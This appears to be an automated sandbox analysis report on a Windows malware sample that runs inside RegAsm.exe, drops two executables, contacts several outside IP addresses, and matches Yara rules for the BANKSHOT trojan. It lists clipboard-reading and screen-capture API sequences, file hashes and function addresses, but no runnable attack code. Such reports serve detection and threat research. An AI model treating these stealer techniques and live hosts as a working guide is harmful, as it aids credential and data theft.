Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.105.54.160:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49782 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411F55

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegAsm.exe.43f8e0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 3.2.RegAsm.exe.43f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 3.2.RegAsm.exe.43dcd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: CBFBKFIDHI.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056
Source: ljhgfsd[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056
Source: KJEHJKJEBG.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: vdshfd[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	3_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C03ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	3_2_6C03ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C07B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C07B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C07B8C0 rand_s,NtQueryVirtualMemory,	3_2_6C07B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C07B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6C07B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C01F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C01F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_024D0C40	0_2_024D0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D933	3_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D1C3	3_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C472	3_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D561	3_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041950A	3_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DD1B	3_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CD2E	3_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B712	3_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0135A0	3_2_6C0135A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C08AC00	3_2_6C08AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C055C10	3_2_6C055C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C062C10	3_2_6C062C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C08542B	3_2_6C08542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C025440	3_2_6C025440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C08545C	3_2_6C08545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C026C80	3_2_6C026C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0734A0	3_2_6C0734A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C07C4A0	3_2_6C07C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0264C0	3_2_6C0264C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C03D4D0	3_2_6C03D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C01D4E0	3_2_6C01D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C056CF0	3_2_6C056CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C02FD00	3_2_6C02FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C03ED10	3_2_6C03ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C040512	3_2_6C040512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C050DD0	3_2_6C050DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0785F0	3_2_6C0785F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C065600	3_2_6C065600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C057E10	3_2_6C057E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C079E30	3_2_6C079E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C034640	3_2_6C034640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C062E4E	3_2_6C062E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C039E50	3_2_6C039E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C053E50	3_2_6C053E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C086E63	3_2_6C086E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C01C670	3_2_6C01C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C07E680	3_2_6C07E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C035E90	3_2_6C035E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C074EA0	3_2_6C074EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0876E3	3_2_6C0876E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C01BEF0	3_2_6C01BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C02FEF0	3_2_6C02FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C029F00	3_2_6C029F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C057710	3_2_6C057710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0677A0	3_2_6C0677A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C01DFE0	3_2_6C01DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C046FF0	3_2_6C046FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C027810	3_2_6C027810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C05B820	3_2_6C05B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C064820	3_2_6C064820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C038850	3_2_6C038850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C03D850	3_2_6C03D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C05F070	3_2_6C05F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0460A0	3_2_6C0460A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0850C7	3_2_6C0850C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C03C0E0	3_2_6C03C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0558E0	3_2_6C0558E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C03A940	3_2_6C03A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C02D960	3_2_6C02D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C06B970	3_2_6C06B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C08B170	3_2_6C08B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C055190	3_2_6C055190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C072990	3_2_6C072990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C01C9A0	3_2_6C01C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C04D9B0	3_2_6C04D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C059A60	3_2_6C059A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C08BA90	3_2_6C08BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0122A0	3_2_6C0122A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C044AA0	3_2_6C044AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C02CAB0	3_2_6C02CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C082AB0	3_2_6C082AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C058AC0	3_2_6C058AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C031AF0	3_2_6C031AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C05E2F0	3_2_6C05E2F0
Source: C:\ProgramData\CBFBKFIDHI.exe	Code function: 7_2_01540C40	7_2_01540C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004103A8	9_2_004103A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00447D38	9_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00401000	9_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004480B0	9_2_004480B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00449120	9_2_00449120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040C1C0	9_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042D250	9_2_0042D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040A231	9_2_0040A231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0044A230	9_2_0044A230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004012C7	9_2_004012C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004452E0	9_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00415352	9_2_00415352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00407450	9_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00405470	9_2_00405470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00409402	9_2_00409402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004404AB	9_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0044A510	9_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004115B0	9_2_004115B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041D610	9_2_0041D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00449620	9_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040A6E0	9_2_0040A6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040B6B0	9_2_0040B6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043F700	9_2_0043F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041E71A	9_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0044B720	9_2_0044B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00428833	9_2_00428833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004338C0	9_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004408E6	9_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004038A0	9_2_004038A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00434990	9_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040ABA0	9_2_0040ABA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042EBBC	9_2_0042EBBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00437CD0	9_2_00437CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00449D22	9_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00407E50	9_2_00407E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00427E6C	9_2_00427E6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00437F30	9_2_00437F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042DFE0	9_2_0042DFE0
Source: C:\ProgramData\KJEHJKJEBG.exe	Code function: 10_2_01150C40	10_2_01150C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20229C20	13_2_20229C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_202D8030	13_2_202D8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20223000	13_2_20223000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_202A4440	13_2_202A4440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_202D24C0	13_2_202D24C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20238120	13_2_20238120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20224970	13_2_20224970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_202A9190	13_2_202A9190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20229A10	13_2_20229A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20259690	13_2_20259690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_202AE2E0	13_2_202AE2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20248760	13_2_20248760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_203A9390	13_2_203A9390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_203A9A20	13_2_203A9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_2038AEBE	13_2_2038AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_203A9F80	13_2_203A9F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_2031F8D0	13_2_2031F8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20343920	13_2_20343920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_2033D100	13_2_2033D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_203361E0	13_2_203361E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_2031A2C0	13_2_2031A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20319430	13_2_20319430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20319CC0	13_2_20319CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_2033FD50	13_2_2033FD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_203416D0	13_2_203416D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_201C4CF0	13_2_201C4CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_201E7810	13_2_201E7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_201C9000	13_2_201C9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_201BF160	13_2_201BF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_201BEA80	13_2_201BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_201C66C0	13_2_201C66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20351BB9	13_2_20351BB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20345CCF	13_2_20345CCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_20364FB2	13_2_20364FB2

Source: Joe Sandbox View	Dropped File: C:\ProgramData\CBFBKFIDHI.exe 7952E7769A991C349CC092B9CB3D1505405E793B526F49C784C343DD7D3CD227
Source: Joe Sandbox View	Dropped File: C:\ProgramData\KJEHJKJEBG.exe F75ACF936390F89239C43552717EFB65C4C3190B16A7EEC62DCD0053A045E91D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CC80 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041D1E0 appears 164 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C04CBE8 appears 124 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C0594D0 appears 60 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.1678282704.00000000008BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.RegAsm.exe.43f8e0.1.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegAsm.exe.43f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
